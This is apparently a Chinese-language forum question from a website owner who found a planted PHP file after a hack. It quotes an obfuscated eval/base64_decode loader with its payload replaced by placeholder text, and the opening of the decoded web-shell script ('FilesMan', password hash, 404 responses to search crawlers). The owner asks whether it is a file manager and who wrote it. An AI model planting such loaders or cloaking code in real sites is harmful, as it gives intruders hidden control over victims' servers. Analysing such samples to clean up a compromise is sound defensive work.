我的网站被黑了,我发现了
<?php
echo eval(base64_decode(str_replace('*','a',str_replace('%','B',str_replace('~','F',str_replace('_','z',str_replace('$','x',str_replace('@','d',str_replace('^','3','SOMEVERYLONGTEXT')))))))));
如果我在不执行的情况下解码base64,我会得到一些脚本,从:
开始$__authentication_pass = "52b1d005abc139cc281a32d8aa7cd1c2";
$color = "#df5";
$__default__action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log', NULL);
.... and many lines below ....
我是这个文件管理员吗?可以以某种方式识别(姓名,作者等)吗?